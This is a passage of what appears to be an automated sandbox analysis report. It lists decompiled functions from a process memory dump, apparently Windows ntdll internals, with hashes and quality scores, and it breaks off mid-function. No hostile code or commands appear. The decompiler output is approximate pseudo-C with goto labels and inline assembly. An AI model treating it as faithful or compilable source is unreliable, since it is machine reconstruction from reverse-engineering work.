                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: eed75105540354d86ea6c0738470601f3c989ea08df707e6585f2a7a84cf8e68
                                          • Instruction ID: 8f509ff9c8f04a640b26d6f1167c8fad9846bc22aeef42a2c8f78e8281f4296d
                                          • Opcode Fuzzy Hash: eed75105540354d86ea6c0738470601f3c989ea08df707e6585f2a7a84cf8e68
                                          • Instruction Fuzzy Hash: 26319CB150C3059FC311DF28E885AABBFE8EB89754F10292EF994A3211D634DD08DB93
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E00E11B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                          				intOrPtr _v8;
                                          				char _v16;
                                          				intOrPtr* _t26;
                                          				intOrPtr _t29;
                                          				void* _t30;
                                          				signed int _t31;
                                          
                                          				_t27 = __ecx;
                                          				_t29 = __edx;
                                          				_t31 = 0;
                                          				_v8 = __edx;
                                          				if(__edx == 0) {
                                          					L18:
                                          					_t30 = 0xc000000d;
                                          					goto L12;
                                          				} else {
                                          					_t26 = _a4;
                                          					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                          						goto L18;
                                          					} else {
                                          						E00E4BB40(__ecx,  &_v16, __ecx);
                                          						_push(_t26);
                                          						_push(0);
                                          						_push(0);
                                          						_push(_t29);
                                          						_push( &_v16);
                                          						_t30 = E00E4A9B0();
                                          						if(_t30 >= 0) {
                                          							_t19 =  *_t26;
                                          							if( *_t26 != 0) {
                                          								goto L7;
                                          							} else {
                                          								 *_a8 =  *_a8 & 0;
                                          							}
                                          						} else {
                                          							if(_t30 != 0xc0000023) {
                                          								L9:
                                          								_push(_t26);
                                          								_push( *_t26);
                                          								_push(_t31);
                                          								_push(_v8);
                                          								_push( &_v16);
                                          								_t30 = E00E4A9B0();
                                          								if(_t30 < 0) {
                                          									L12:
                                          									if(_t31 != 0) {
                                          										L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                          									}
                                          								} else {
                                          									 *_a8 = _t31;
                                          								}
                                          							} else {
                                          								_t19 =  *_t26;
                                          								if( *_t26 == 0) {
                                          									_t31 = 0;
                                          								} else {
                                          									L7:
                                          									_t31 = L00E24620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                          								}
                                          								if(_t31 == 0) {
                                          									_t30 = 0xc0000017;
                                          								} else {
                                          									goto L9;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t30;
                                          			}










                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: WindowsExcludedProcs
                                          • API String ID: 0-3583428290
                                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction ID: 04f2d97242ad1b5bb76cfe965a66739594e89117a309327daec2033bc010de1a
                                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction Fuzzy Hash: 97212536584228ABCB25DA95D844FDBB7ACEF80754F1520A5FA04BB200D630DC00D7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00E2F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                          				intOrPtr _t13;
                                          				intOrPtr _t14;
                                          				signed int _t16;
                                          				signed char _t17;
                                          				intOrPtr _t19;
                                          				intOrPtr _t21;
                                          				intOrPtr _t23;
                                          				intOrPtr* _t25;
                                          
                                          				_t25 = _a8;
                                          				_t17 = __ecx;
                                          				if(_t25 == 0) {
                                          					_t19 = 0xc00000f2;
                                          					L8:
                                          					return _t19;
                                          				}
                                          				if((__ecx & 0xfffffffe) != 0) {
                                          					_t19 = 0xc00000ef;
                                          					goto L8;
                                          				}
                                          				_t19 = 0;
                                          				 *_t25 = 0;
                                          				_t21 = 0;
                                          				_t23 = "Actx ";
                                          				if(__edx != 0) {
                                          					if(__edx == 0xfffffffc) {
                                          						L21:
                                          						_t21 = 0x200;
                                          						L5:
                                          						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                          						 *_t25 = _t13;
                                          						L6:
                                          						if(_t13 == 0) {
                                          							if((_t17 & 0x00000001) != 0) {
                                          								 *_t25 = _t23;
                                          							}
                                          						}
                                          						L7:
                                          						goto L8;
                                          					}
                                          					if(__edx == 0xfffffffd) {
                                          						 *_t25 = _t23;
                                          						_t13 = _t23;
                                          						goto L6;
                                          					}
                                          					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                          					 *_t25 = _t13;
                                          					L14:
                                          					if(_t21 == 0) {
                                          						goto L6;
                                          					}
                                          					goto L5;
                                          				}
                                          				_t14 = _a4;
                                          				if(_t14 != 0) {
                                          					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                          					if(_t16 <= 1) {
                                          						_t21 = 0x1f8;
                                          						_t13 = 0;
                                          						goto L14;
                                          					}
                                          					if(_t16 == 2) {
                                          						goto L21;
                                          					}
                                          					if(_t16 != 4) {
                                          						_t19 = 0xc00000f0;
                                          						goto L7;
                                          					}
                                          					_t13 = 0;
                                          					goto L6;
                                          				} else {
                                          					_t21 = 0x1f8;
                                          					goto L5;
                                          				}
                                          			}












                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Actx
                                          • API String ID: 0-89312691
                                          • Opcode ID: 897d01695619779310195b00f3fc3f35413b2ead2afa954f421d44e7925ff03f
                                          • Instruction ID: bd99afa05f1bcc394fb2c8f922cd26acf364162dda55da7b077c690c15f62c57
                                          • Opcode Fuzzy Hash: 897d01695619779310195b00f3fc3f35413b2ead2afa954f421d44e7925ff03f
                                          • Instruction Fuzzy Hash: B111E2343246228BEB284E1DE9907B673B5EB95728F34653BE866FB390DB70CC009340
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 71%
                                          			E00EB8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                          				intOrPtr _t35;
                                          				void* _t41;
                                          
                                          				_t40 = __esi;
                                          				_t39 = __edi;
                                          				_t38 = __edx;
                                          				_t35 = __ecx;
                                          				_t34 = __ebx;
                                          				_push(0x74);
                                          				_push(0xee0d50);
                                          				E00E5D0E8(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                          				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                          				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                          					E00E95720(0x65, 0, "Critical error detected %lx\n", _t35);
                                          					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                          						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                          						asm("int3");
                                          						 *(_t41 - 4) = 0xfffffffe;
                                          					}
                                          				}
                                          				 *(_t41 - 4) = 1;
                                          				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                          				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                          				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                          				 *((intOrPtr*)(_t41 - 0x64)) = L00E5DEF0;
                                          				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                          				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                          				_push(_t41 - 0x70);
                                          				L00E5DEF0(1, _t38);
                                          				 *(_t41 - 4) = 0xfffffffe;
                                          				return E00E5D130(_t34, _t39, _t40);
                                          			}






                                          Strings
                                          • Critical error detected %lx, xrefs: 00EB8E21
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Critical error detected %lx
                                          • API String ID: 0-802127002
                                          • Opcode ID: facf38c164d6a15f2f0328c1aba454db78dafb7287f31da518c27cc6eb83e1f3
                                          • Instruction ID: 74cfda67c5ab39c2e7d9c77c0a9348f68eee07c534c27e26560a0f9281ab33c4
                                          • Opcode Fuzzy Hash: facf38c164d6a15f2f0328c1aba454db78dafb7287f31da518c27cc6eb83e1f3
                                          • Instruction Fuzzy Hash: 14117571D14348DADF25CFA88A067DDBBB5AB04315F24665EE428BB392CB708A06CF14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00E9FF60
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                          • API String ID: 0-1911121157
                                          • Opcode ID: d9cfa938eeb63a7417b6b881a3881040e8e45fab02acde961ff1c8db2cd5d542
                                          • Instruction ID: 2a82423464171210eb236371d5ff0f4a20792d8fead348152ef52ea45b8f21a6
                                          • Opcode Fuzzy Hash: d9cfa938eeb63a7417b6b881a3881040e8e45fab02acde961ff1c8db2cd5d542
                                          • Instruction Fuzzy Hash: 1011E171A10544EFCF22DB50CD49FA8BBB1FF48709F149454F508B72A2C7799984CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E00ED5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                          				signed int _t296;
                                          				signed char _t298;
                                          				signed int _t301;
                                          				signed int _t306;
                                          				signed int _t310;
                                          				signed char _t311;
                                          				intOrPtr _t312;
                                          				signed int _t313;
                                          				void* _t327;
                                          				signed int _t328;
                                          				intOrPtr _t329;
                                          				intOrPtr _t333;
                                          				signed char _t334;
                                          				signed int _t336;
                                          				void* _t339;
                                          				signed int _t340;
                                          				signed int _t356;
                                          				signed int _t362;
                                          				short _t367;
                                          				short _t368;
                                          				short _t373;
                                          				signed int _t380;
                                          				void* _t382;
                                          				short _t385;
                                          				signed short _t392;
                                          				signed char _t393;
                                          				signed int _t395;
                                          				signed char _t397;
                                          				signed int _t398;
                                          				signed short _t402;
                                          				void* _t406;
                                          				signed int _t412;
                                          				signed char _t414;
                                          				signed short _t416;
                                          				signed int _t421;
                                          				signed char _t427;
                                          				intOrPtr _t434;
                                          				signed char _t435;
                                          				signed int _t436;
                                          				signed int _t442;
                                          				signed int _t446;
                                          				signed int _t447;
                                          				signed int _t451;
                                          				signed int _t453;
                                          				signed int _t454;
                                          				signed int _t455;
                                          				intOrPtr _t456;
                                          				intOrPtr* _t457;
                                          				short _t458;
                                          				signed short _t462;
                                          				signed int _t469;
                                          				intOrPtr* _t474;
                                          				signed int _t475;
                                          				signed int _t479;
                                          				signed int _t480;
                                          				signed int _t481;
                                          				short _t485;
                                          				signed int _t491;
                                          				signed int* _t494;
                                          				signed int _t498;
                                          				signed int _t505;
                                          				intOrPtr _t506;
                                          				signed short _t508;
                                          				signed int _t511;
                                          				void* _t517;
                                          				signed int _t519;
                                          				signed int _t522;
                                          				void* _t523;
                                          				signed int _t524;
                                          				void* _t528;
                                          				signed int _t529;
                                          
                                          				_push(0xd4);
                                          				_push(0xee1178);
                                          				E00E5D0E8(__ebx, __edi, __esi);
                                          				_t494 = __edx;
                                          				 *(_t528 - 0xcc) = __edx;
                                          				_t511 = __ecx;
                                          				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                          				 *(_t528 - 0xbc) = __ecx;
                                          				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                          				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                          				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                          				_t427 = 0;
                                          				 *(_t528 - 0x74) = 0;
                                          				 *(_t528 - 0x9c) = 0;
                                          				 *(_t528 - 0x84) = 0;
                                          				 *(_t528 - 0xac) = 0;
                                          				 *(_t528 - 0x88) = 0;
                                          				 *(_t528 - 0xa8) = 0;
                                          				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                          				if( *(_t528 + 0x1c) <= 0x80) {
                                          					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                          					if(__eflags != 0) {
                                          						_t421 = E00ED4C56(0, __edx, __ecx, __eflags);
                                          						__eflags = _t421;
                                          						if(_t421 != 0) {
                                          							 *((intOrPtr*)(_t528 - 4)) = 0;
                                          							E00E4D000(0x410);
                                          							 *(_t528 - 0x18) = _t529;
                                          							 *(_t528 - 0x9c) = _t529;
                                          							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                          							E00ED5542(_t528 - 0x9c, _t528 - 0x84);
                                          						}
                                          					}
                                          					_t435 = _t427;
                                          					 *(_t528 - 0xd0) = _t435;
                                          					_t474 = _t511 + 0x65;
                                          					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                          					_t511 = 0x18;
                                          					while(1) {
                                          						 *(_t528 - 0xa0) = _t427;
                                          						 *(_t528 - 0xbc) = _t427;
                                          						 *(_t528 - 0x80) = _t427;
                                          						 *(_t528 - 0x78) = 0x50;
                                          						 *(_t528 - 0x79) = _t427;
                                          						 *(_t528 - 0x7a) = _t427;
                                          						 *(_t528 - 0x8c) = _t427;
                                          						 *(_t528 - 0x98) = _t427;
                                          						 *(_t528 - 0x90) = _t427;
                                          						 *(_t528 - 0xb0) = _t427;
                                          						 *(_t528 - 0xb8) = _t427;
                                          						_t296 = 1 << _t435;
                                          						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                          						__eflags = _t436 & _t296;
                                          						if((_t436 & _t296) != 0) {
                                          							goto L92;
                                          						}
                                          						__eflags =  *((char*)(_t474 - 1));
                                          						if( *((char*)(_t474 - 1)) == 0) {
                                          							goto L92;
                                          						}
                                          						_t301 =  *_t474;
                                          						__eflags = _t494[1] - _t301;
                                          						if(_t494[1] <= _t301) {
                                          							L10:
                                          							__eflags =  *(_t474 - 5) & 0x00000040;
                                          							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                          								L12:
                                          								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                          								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                          									goto L92;
                                          								}
                                          								_t442 =  *(_t474 - 0x11) & _t494[3];
                                          								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                          								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                          									goto L92;
                                          								}
                                          								__eflags = _t442 -  *(_t474 - 0x11);
                                          								if(_t442 !=  *(_t474 - 0x11)) {
                                          									goto L92;
                                          								}
                                          								L15:
                                          								_t306 =  *(_t474 + 1) & 0x000000ff;
                                          								 *(_t528 - 0xc0) = _t306;
                                          								 *(_t528 - 0xa4) = _t306;
                                          								__eflags =  *0xef60e8;
                                          								if( *0xef60e8 != 0) {
                                          									__eflags = _t306 - 0x40;
                                          									if(_t306 < 0x40) {
                                          										L20:
                                          										asm("lock inc dword [eax]");
                                          										_t310 =  *0xef60e8; // 0x0
                                          										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                          										__eflags = _t311 & 0x00000001;
                                          										if((_t311 & 0x00000001) == 0) {
                                          											 *(_t528 - 0xa0) = _t311;
                                          											_t475 = _t427;
                                          											 *(_t528 - 0x74) = _t427;
                                          											__eflags = _t475;
                                          											if(_t475 != 0) {
                                          												L91:
                                          												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                          												goto L92;
                                          											}
                                          											asm("sbb edi, edi");
                                          											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                          											_t511 = _t498;
                                          											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                          											__eflags =  *(_t312 - 5) & 1;
                                          											if(( *(_t312 - 5) & 1) != 0) {
                                          												_push(_t528 - 0x98);
                                          												_push(0x4c);
                                          												_push(_t528 - 0x70);
                                          												_push(1);
                                          												_push(0xfffffffa);
                                          												_t412 = E00E49710();
                                          												_t475 = _t427;
                                          												__eflags = _t412;
                                          												if(_t412 >= 0) {
                                          													_t414 =  *(_t528 - 0x98) - 8;
                                          													 *(_t528 - 0x98) = _t414;
                                          													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                          													 *(_t528 - 0x8c) = _t416;
                                          													 *(_t528 - 0x79) = 1;
                                          													_t511 = (_t416 & 0x0000ffff) + _t498;
                                          													__eflags = _t511;
                                          												}
                                          											}
                                          											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                          											__eflags = _t446 & 0x00000004;
                                          											if((_t446 & 0x00000004) != 0) {
                                          												__eflags =  *(_t528 - 0x9c);
                                          												if( *(_t528 - 0x9c) != 0) {
                                          													 *(_t528 - 0x7a) = 1;
                                          													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                          													__eflags = _t511;
                                          												}
                                          											}
                                          											_t313 = 2;
                                          											_t447 = _t446 & _t313;
                                          											__eflags = _t447;
                                          											 *(_t528 - 0xd4) = _t447;
                                          											if(_t447 != 0) {
                                          												_t406 = 0x10;
                                          												_t511 = _t511 + _t406;
                                          												__eflags = _t511;
                                          											}
                                          											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                          											 *(_t528 - 0x88) = _t427;
                                          											__eflags =  *(_t528 + 0x1c);
                                          											if( *(_t528 + 0x1c) <= 0) {
                                          												L45:
                                          												__eflags =  *(_t528 - 0xb0);
                                          												if( *(_t528 - 0xb0) != 0) {
                                          													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                          													__eflags = _t511;
                                          												}
                                          												__eflags = _t475;
                                          												if(_t475 != 0) {
                                          													asm("lock dec dword [ecx+edx*8+0x4]");
                                          													goto L100;
                                          												} else {
                                          													_t494[3] = _t511;
                                          													_t451 =  *(_t528 - 0xa0);
                                          													_t427 = E00E46DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                          													 *(_t528 - 0x88) = _t427;
                                          													__eflags = _t427;
                                          													if(_t427 == 0) {
                                          														__eflags = _t511 - 0xfff8;
                                          														if(_t511 <= 0xfff8) {
                                          															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                          															asm("sbb ecx, ecx");
                                          															__eflags = (_t451 & 0x000000e2) + 8;
                                          														}
                                          														asm("lock dec dword [eax+edx*8+0x4]");
                                          														L100:
                                          														goto L101;
                                          													}
                                          													_t453 =  *(_t528 - 0xa0);
                                          													 *_t494 = _t453;
                                          													_t494[1] = _t427;
                                          													_t494[2] =  *(_t528 - 0xbc);
                                          													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                          													 *_t427 =  *(_t453 + 0x24) | _t511;
                                          													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                          													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													__eflags =  *(_t528 + 0x14);
                                          													if( *(_t528 + 0x14) == 0) {
                                          														__eflags =  *[fs:0x18] + 0xf50;
                                          													}
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													__eflags =  *(_t528 + 0x18);
                                          													if( *(_t528 + 0x18) == 0) {
                                          														_t454 =  *(_t528 - 0x80);
                                          														_t479 =  *(_t528 - 0x78);
                                          														_t327 = 1;
                                          														__eflags = 1;
                                          													} else {
                                          														_t146 = _t427 + 0x50; // 0x50
                                          														_t454 = _t146;
                                          														 *(_t528 - 0x80) = _t454;
                                          														_t382 = 0x18;
                                          														 *_t454 = _t382;
                                          														 *((short*)(_t454 + 2)) = 1;
                                          														_t385 = 0x10;
                                          														 *((short*)(_t454 + 6)) = _t385;
                                          														 *(_t454 + 4) = 0;
                                          														asm("movsd");
                                          														asm("movsd");
                                          														asm("movsd");
                                          														asm("movsd");
                                          														_t327 = 1;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 = 0x68;
                                          														 *(_t528 - 0x78) = _t479;
                                          													}
                                          													__eflags =  *(_t528 - 0x79) - _t327;
                                          													if( *(_t528 - 0x79) == _t327) {
                                          														_t524 = _t479 + _t427;
                                          														_t508 =  *(_t528 - 0x8c);
                                          														 *_t524 = _t508;
                                          														_t373 = 2;
                                          														 *((short*)(_t524 + 2)) = _t373;
                                          														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                          														 *((short*)(_t524 + 4)) = 0;
                                          														_t167 = _t524 + 8; // 0x8
                                          														E00E4F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                          														_t529 = _t529 + 0xc;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                          														 *(_t528 - 0x78) = _t479;
                                          														_t380 =  *(_t528 - 0x80);
                                          														__eflags = _t380;
                                          														if(_t380 != 0) {
                                          															_t173 = _t380 + 4;
                                          															 *_t173 =  *(_t380 + 4) | 1;
                                          															__eflags =  *_t173;
                                          														}
                                          														_t454 = _t524;
                                          														 *(_t528 - 0x80) = _t454;
                                          														_t327 = 1;
                                          														__eflags = 1;
                                          													}
                                          													__eflags =  *(_t528 - 0xd4);
                                          													if( *(_t528 - 0xd4) == 0) {
                                          														_t505 =  *(_t528 - 0x80);
                                          													} else {
                                          														_t505 = _t479 + _t427;
                                          														_t523 = 0x10;
                                          														 *_t505 = _t523;
                                          														_t367 = 3;
                                          														 *((short*)(_t505 + 2)) = _t367;
                                          														_t368 = 4;
                                          														 *((short*)(_t505 + 6)) = _t368;
                                          														 *(_t505 + 4) = 0;
                                          														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                          														_t327 = 1;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 = _t479 + _t523;
                                          														 *(_t528 - 0x78) = _t479;
                                          														__eflags = _t454;
                                          														if(_t454 != 0) {
                                          															_t186 = _t454 + 4;
                                          															 *_t186 =  *(_t454 + 4) | 1;
                                          															__eflags =  *_t186;
                                          														}
                                          														 *(_t528 - 0x80) = _t505;
                                          													}
                                          													__eflags =  *(_t528 - 0x7a) - _t327;
                                          													if( *(_t528 - 0x7a) == _t327) {
                                          														 *(_t528 - 0xd4) = _t479 + _t427;
                                          														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                          														E00E4F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                          														_t529 = _t529 + 0xc;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 =  *(_t528 - 0x78) + _t522;
                                          														 *(_t528 - 0x78) = _t479;
                                          														__eflags = _t505;
                                          														if(_t505 != 0) {
                                          															_t199 = _t505 + 4;
                                          															 *_t199 =  *(_t505 + 4) | 1;
                                          															__eflags =  *_t199;
                                          														}
                                          														_t505 =  *(_t528 - 0xd4);
                                          														 *(_t528 - 0x80) = _t505;
                                          													}
                                          													__eflags =  *(_t528 - 0xa8);
                                          													if( *(_t528 - 0xa8) != 0) {
                                          														_t356 = _t479 + _t427;
                                          														 *(_t528 - 0xd4) = _t356;
                                          														_t462 =  *(_t528 - 0xac);
                                          														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                          														_t485 = 0xc;
                                          														 *((short*)(_t356 + 2)) = _t485;
                                          														 *(_t356 + 6) = _t462;
                                          														 *((short*)(_t356 + 4)) = 0;
                                          														_t211 = _t356 + 8; // 0x9
                                          														E00E4F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                          														E00E4FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                          														_t529 = _t529 + 0x18;
                                          														_t427 =  *(_t528 - 0x88);
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t505 =  *(_t528 - 0xd4);
                                          														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                          														 *(_t528 - 0x78) = _t479;
                                          														_t362 =  *(_t528 - 0x80);
                                          														__eflags = _t362;
                                          														if(_t362 != 0) {
                                          															_t222 = _t362 + 4;
                                          															 *_t222 =  *(_t362 + 4) | 1;
                                          															__eflags =  *_t222;
                                          														}
                                          													}
                                          													__eflags =  *(_t528 - 0xb0);
                                          													if( *(_t528 - 0xb0) != 0) {
                                          														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                          														_t458 = 0xb;
                                          														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                          														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                          														 *((short*)(_t427 + 4 + _t479)) = 0;
                                          														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                          														E00E4FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                          														_t529 = _t529 + 0xc;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                          														 *(_t528 - 0x78) = _t479;
                                          														__eflags = _t505;
                                          														if(_t505 != 0) {
                                          															_t241 = _t505 + 4;
                                          															 *_t241 =  *(_t505 + 4) | 1;
                                          															__eflags =  *_t241;
                                          														}
                                          													}
                                          													_t328 =  *(_t528 + 0x1c);
                                          													__eflags = _t328;
                                          													if(_t328 == 0) {
                                          														L87:
                                          														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                          														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                          														_t455 =  *(_t528 - 0xdc);
                                          														 *(_t427 + 0x14) = _t455;
                                          														_t480 =  *(_t528 - 0xa0);
                                          														_t517 = 3;
                                          														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                          														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                          															asm("rdtsc");
                                          															 *(_t427 + 0x3c) = _t480;
                                          														} else {
                                          															 *(_t427 + 0x3c) = _t455;
                                          														}
                                          														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                          														_t456 =  *[fs:0x18];
                                          														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                          														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                          														_t427 = 0;
                                          														__eflags = 0;
                                          														_t511 = 0x18;
                                          														goto L91;
                                          													} else {
                                          														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                          														__eflags = _t519;
                                          														 *(_t528 - 0x8c) = _t328;
                                          														do {
                                          															_t506 =  *((intOrPtr*)(_t519 - 4));
                                          															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                          															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                          															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                          															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                          															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                          																_t334 =  *_t519;
                                          															} else {
                                          																_t334 = 0;
                                          															}
                                          															_t336 = _t334 & 0x000000ff;
                                          															__eflags = _t336;
                                          															_t427 =  *(_t528 - 0x88);
                                          															if(_t336 == 0) {
                                          																_t481 = _t479 + _t506;
                                          																__eflags = _t481;
                                          																 *(_t528 - 0x78) = _t481;
                                          																E00E4F3E0(_t479 + _t427, _t457, _t506);
                                          																_t529 = _t529 + 0xc;
                                          															} else {
                                          																_t340 = _t336 - 1;
                                          																__eflags = _t340;
                                          																if(_t340 == 0) {
                                          																	E00E4F3E0( *(_t528 - 0xb8), _t457, _t506);
                                          																	_t529 = _t529 + 0xc;
                                          																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                          																} else {
                                          																	__eflags = _t340 == 0;
                                          																	if(_t340 == 0) {
                                          																		__eflags = _t506 - 8;
                                          																		if(_t506 == 8) {
                                          																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                          																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                          																		}
                                          																	}
                                          																}
                                          															}
                                          															_t339 = 0x10;
                                          															_t519 = _t519 + _t339;
                                          															_t263 = _t528 - 0x8c;
                                          															 *_t263 =  *(_t528 - 0x8c) - 1;
                                          															__eflags =  *_t263;
                                          															_t479 =  *(_t528 - 0x78);
                                          														} while ( *_t263 != 0);
                                          														goto L87;
                                          													}
                                          												}
                                          											} else {
                                          												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                          												 *(_t528 - 0xa2) = _t392;
